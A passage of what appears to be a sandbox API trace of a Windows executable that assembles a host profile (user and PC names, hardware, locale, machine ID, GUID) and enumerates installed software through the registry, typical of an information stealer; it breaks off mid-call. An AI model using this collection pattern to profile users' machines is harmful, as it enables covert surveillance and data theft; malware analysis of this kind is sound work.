0x0 [0208.053] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: ", lpString2="03845cb8-7441-4a2f-8c0f-c90408af5778" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778" [0208.053] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\n" [0208.053] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\n", lpString2="GUID: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: " [0208.054] GetCurrentHwProfileA (in: lpHwProfileInfo=0x19d5b4 | out: lpHwProfileInfo=0x19d5b4) returned 1 [0208.055] GetProcessHeap () returned 0x5b0000 [0208.055] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x64) returned 0x623200 [0208.055] lstrcatA (in: lpString1="", lpString2="{c20d559d-6c9d-11eb-b0a3-806e6f6e6963}" | out: lpString1="{c20d559d-6c9d-11eb-b0a3-806e6f6e6963}") returned="{c20d559d-6c9d-11eb-b0a3-806e6f6e6963}" [0208.055] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: ", lpString2="{c20d559d-6c9d-11eb-b0a3-806e6f6e6963}" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}" [0208.055] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\n" [0208.055] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\n", lpString2="Installed Software: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: " [0208.056] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: ", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \n" [0208.056] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce20 | out: phkResult=0x19ce20*=0x3a8) returned 0x0 [0208.056] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x0, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AddressBook", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.056] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\AddressBook") returned 67 [0208.056] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\AddressBook", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.056] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0xe0, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.056] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.056] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x1, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Connection Manager", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.056] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\Connection Manager") returned 74 [0208.056] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\Connection Manager", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.057] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0xe0, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.057] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.057] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x2, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DirectDrawEx", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.057] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\DirectDrawEx") returned 68 [0208.057] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\DirectDrawEx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.057] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0xe0, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.057] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.057] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x3, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DXM_Runtime", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.057] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\DXM_Runtime") returned 67 [0208.057] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\DXM_Runtime", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.057] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0xe0, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.057] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.057] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x4, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fontcore", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.057] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\Fontcore") returned 64 [0208.057] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\Fontcore", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.057] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0xe0, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.057] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.058] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x5, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE40", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.058] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\IE40") returned 60 [0208.058] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\IE40", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.058] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0xe0, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.058] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.058] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x6, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE4Data", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.058] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\IE4Data") returned 63 [0208.058] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\IE4Data", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.058] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0xe0, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.058] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.097] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x7, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE5BAKEX", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.097] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\IE5BAKEX") returned 64 [0208.097] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\IE5BAKEX", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.097] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0xe0, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.097] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.097] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x8, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEData", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.097] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\IEData") returned 62 [0208.097] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\IEData", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.098] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0xe0, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.098] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.098] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x9, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MobileOptionPack", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.098] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\MobileOptionPack") returned 72 [0208.098] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\MobileOptionPack", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.098] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, 